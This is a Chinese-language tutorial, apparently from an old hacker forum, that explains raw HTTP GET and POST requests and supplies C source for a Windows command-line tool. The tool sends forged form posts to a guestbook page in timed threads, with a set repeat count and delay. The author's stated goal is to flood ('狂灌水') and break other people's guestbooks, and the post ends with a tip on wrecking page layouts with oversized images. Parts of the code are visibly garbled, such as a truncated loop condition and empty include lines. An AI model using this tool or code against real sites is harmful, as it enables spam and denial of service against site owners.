在寫這篇文章之前，有必要對"注入"一詞闡述一下。區(qū)別于通常的SQL注入，這里的注入實際上只是構(gòu)造HTTP請求報文，以程序的方式代替WEB提交頁面，實現(xiàn)數(shù)據(jù)的自動提交。嘿嘿，說到這，我看到你詭異的笑容了，我們只要寫個循環(huán)，用什么語言你說了算，向特定的WEB頁面發(fā)送HTTP報文，只要幾分鐘，呵呵他的本本就爆了，而且......嘿、嘿、嘿......偶喝杯茶，接下再寫。
首先，還是溫習(xí)一下HTTP協(xié)議吧。我們在打開一個網(wǎng)站時，比如說http://www.163.com，實際上IE作為一個客戶端，它將向服務(wù)器發(fā)送如下的請求報文（偶用sniffer截得的）：
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.163.com
Connection: Keep-Alive
Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES
我們看到在以上的報文中，有很多字段，當(dāng)然其中有很多并不是必須的，如果我們自己編程，只關(guān)心必要的就行了。在HTTP/1.1協(xié)議中規(guī)定了最小請求消息由方法字段（GET/POST/HEAD）和主機(jī)字段（HOST）構(gòu)成。如上面的
GET / HTTP/1.1
HOST:www.163.com
但在HTTP/1.0中，HOST字段并不是必須的，這里為什么不能省，相信你也知道，不曉得的話也不打緊，接下來看。
為了向服務(wù)器發(fā)送數(shù)據(jù)，瀏覽器通常采用GET或POST方法向服務(wù)器提交報文。服務(wù)器在收到報文之后，解碼分析出所需的數(shù)據(jù)并進(jìn)行處理，最后返回結(jié)果。通常我們可以見到諸如http://xxx.xxx.xxx.xxx/show.asp?id=xxx的URL請求，我們可以自己構(gòu)造如下的報文來完成
GET /show.asp?id=xxx HTTP/1.1
HOST:xxx.xxx.xxx.xxx
受URL長度1024的限制，采用GET方法只能提交少量的數(shù)據(jù)，假如我們在錄入一篇文章時，這時就只能用到POST方法了。在講解POST方法的一些要點(diǎn)之前，還是讓大家來看一段POST請求報文，以致對POST報文有個大致的了解。（下面是我向某本本的留言，偶照樣用sniffer截下來了）
POST /gbook/add.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Referer: http://218.76.65.47/gbook/add.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 218.76.65.47
Content-Length: 115
Connection: Keep-Alive
name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
與GET方法相比，在字段下面多了一段內(nèi)容，這就是我們向留言本提交的數(shù)據(jù)，如果有中文須經(jīng)過urlencode編碼。同樣讓我們省去不必要的字段，構(gòu)造一個最小的POST請求
POST /gbook/add.php HTTP/1.1
Host: 218.76.65.47
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
上面的Content-Type字段表示為POST表單型的，Content-Length當(dāng)然就是表示實體數(shù)據(jù)的長度了，這里都不能少，不然就無法正確接收了。這樣，服務(wù)器端處理頁面就會收到你提交的數(shù)據(jù)，并接收處理，如果是留言本的話就寫入數(shù)據(jù)庫了。若以很快的速度向某個本本發(fā)送這樣的報文，實際上那個本本己經(jīng)被你狂灌水了。
嗚嗚嗚，看上面偶都不知道講了些什么，亂不拉幾的，就是偶也想盡量講得清楚點(diǎn)，無耐高考語文沒及格，就成這樣了咯，還望哥哥姐姐們見諒見諒。講了客戶端的發(fā)送，接下來就該講服務(wù)器的接收問題了。
當(dāng)報文數(shù)據(jù)到達(dá)服務(wù)器后，服務(wù)器底層進(jìn)程進(jìn)行接收并放入特定的緩沖區(qū)，同時置一些環(huán)境變量，如"CONTENT_LENGTH"、"QUERY_STRING"等，當(dāng)然這其間還是屏蔽了一些底層細(xì)節(jié)的，如客戶端提交的數(shù)據(jù)是怎么被重置到被請求頁的標(biāo)準(zhǔn)輸入的，偶也弄不清楚，嘿嘿要能弄清楚了，偶就寫操作系統(tǒng)去。之后高層應(yīng)用程序如CGI、ASP、PHP等對其進(jìn)行數(shù)據(jù)提取，其中CGI還須自己進(jìn)行Unencode解碼和字符串提取。假如向一ASP本本寫留言，我提交了姓名（name）和內(nèi)容（body）字段，且采用POST表單方式提交，在ASP程序中應(yīng)如下進(jìn)行接收：
name=request.form("name")
body=request.form("body")
并添加到數(shù)據(jù)庫中
rs.addnew
rs("name")=name
rs("body")=body
rs.update
到此，該講的也基本上講完了，但有一點(diǎn)還要注意下，在發(fā)送報文時，在實體內(nèi)容中還須加入提交按鈕的"name=value"URLEncode編碼，否則有可能不會寫入數(shù)據(jù)庫，Why ?I am finding the reason!
　
　
以下是相關(guān)的源代碼：
/*    encode.h    */
/* Unencode URL編碼函數(shù) */
/*
在這里要注意，編譯器在處理中文字符時，會自動根據(jù)字符的位7來讀入一個
或兩個字符，這時可以強(qiáng)制采用unsigned char *來讀入一個字符。
*/
int isT(char ch)
{
if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
else return 0;
}
int encode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
unsigned char *p=(unsigned char*)s;
if(*p==' ')
{
*d='%';
*(d+1)='2';
*(d+2)='0';
d+=3;
}
else if(isT(*p))
{
char a[3];
*d='%';
sprintf(a,"%02x",*p);
*(d+1)=a[0];
*(d+2)=a[1];
d+=3;
}
else
{
*d=*p;
d++;
}
}
*d=0;
return 1;
}
/* Unencode URL解碼函數(shù) */
int unencode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
if(*s=='+')
{
*d=' ';
d++;
}
else if(*s=='%')
{
int code;
if(sscanf(s+1,"%02x",&code)!=1) code='?';
*d=code;
s+=2;
d++;
}
else
{
*d=*s;
d++;
}
}
*d=0;
return 1;
}
/*  booksend.cpp  */
/*    報文發(fā)送程序    */
#include
#include
#include "encode.h"
#include
#pragma comment(lib,"ws2_32.lib")
int checkpra(int argc,char *argv[]);
void usage();
DWORD WINAPI senddata(LPVOID lp);
char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;
int delaytime=2000;
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};
void main(int argc,char *argv[])
{
if(checkpra(argc,argv)==-1) return;
WSADATA wsa;
if(WSAStartup(0x0202,&wsa)!=0)
{
printf("WSAStartup failed with error:%d\n",GetLastError());
return;
}
sin.sin_family=AF_INET;
if(inet_addr(ip)!=INADDR_NONE)
sin.sin_addr.s_addr=inet_addr(ip);
else
{
struct hostent *phost=gethostbyname(ip);
if(phost==NULL)
{
printf("Resolve %s error!\n",ip);
return;
}
memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
}
sin.sin_port=htons(port);
char tempbuf[1024]={0};
sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
strcpy(sendbuf,tempbuf);
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"HOST: %s\n",ip);
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Accept: image/gif, */*\n");
strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Connection: Keep-Alive\n\n");
strcat(sendbuf,value);
for(int i=0;i    {
CreateThread(NULL,0,senddata,&i,0,NULL);
Sleep(delaytime);
}
WSACleanup();
}
DWORD WINAPI senddata(LPVOID lp)
{
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==INVALID_SOCKET)
{
printf("Socket() failed with error:%d\n",GetLastError());
return -1;
}
int ret;
printf("State:Connecting...\n");
ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR)
{
printf("Connect() failed with error:%d\n",GetLastError());
return -1;
}
printf("State:Connected!\n");
printf("State:Sending...time %d ",*(int*)lp+1);
ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
if(ret>0)
printf("Send success!\n");
else
printf("Send error!\n");
char recvbuf[1024*10]={0};
ret=recv(sock,recvbuf,sizeof(recvbuf),0);
if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
printf("呵呵，注入成功啦!\n\n");
else
printf("注入有點(diǎn)問題哦，請查實一下!\n\n");
closesocket(sock);
return 1;
}
void usage()
{
char pathname[128]={0};
GetModuleFileName(NULL,pathname,sizeof(pathname));
char *p=pathname+strlen(pathname)-1;
for(;*p!='\\';p--);
printf("-------------------------------------------------------------------------------\n");
printf("Usage:%s ip port page value [times] [delay]\n",p+1);
printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=發(fā)送留言",p+1);
printf("-------------------------------------------------------------------------------\n");
}
int checkpra(int argc,char *argv[])
{
if(argc<5)
{
printf("錯誤的用法：至少應(yīng)使用4個參數(shù)\n\n");
usage();
return -1;
}
else if(argc>6)
{
printf("錯誤的用法：最多只有6個參數(shù)\n\n");
usage();
return -1;
}
if(argc==6)
{
ttime=atoi(argv[5]);
}
if(argc==7)
{
ttime=atoi(argv[5]);
delaytime=atoi(argv[6]);
}
strcpy(ip,argv[1]);
port=atoi(argv[2]);
strcpy(page,argv[3]);
for(int i=0;argv[4][i]!=0;i++)
{
if(argv[4][i]=='-') argv[4][i]='&';
if(argv[4][i]=='\'') argv[4][i]=' ';
}
encode(argv[4],value);
return 0;
}
以上代碼已在VC6上編譯通過，你也可以到本人個人主頁上（http://jsufcz.21xcn.net）下載到源代碼和命令行程序。
在文章的最后，偶還有一點(diǎn)心得要與大家分享。在留言本中如果有提交表情或是圖片之類的，由于本本的相對鏈接的限制，只要是本本目錄下的圖片資源，偶們就可以隨便拿來貼，這樣如果某個圖片的盡寸很大的話，本本的版面就被你弄壞了。
（申明：本文章是偶拿來供感興趣的技術(shù)業(yè)朋友分享的，若有人用于非法企圖，偶可不管咯）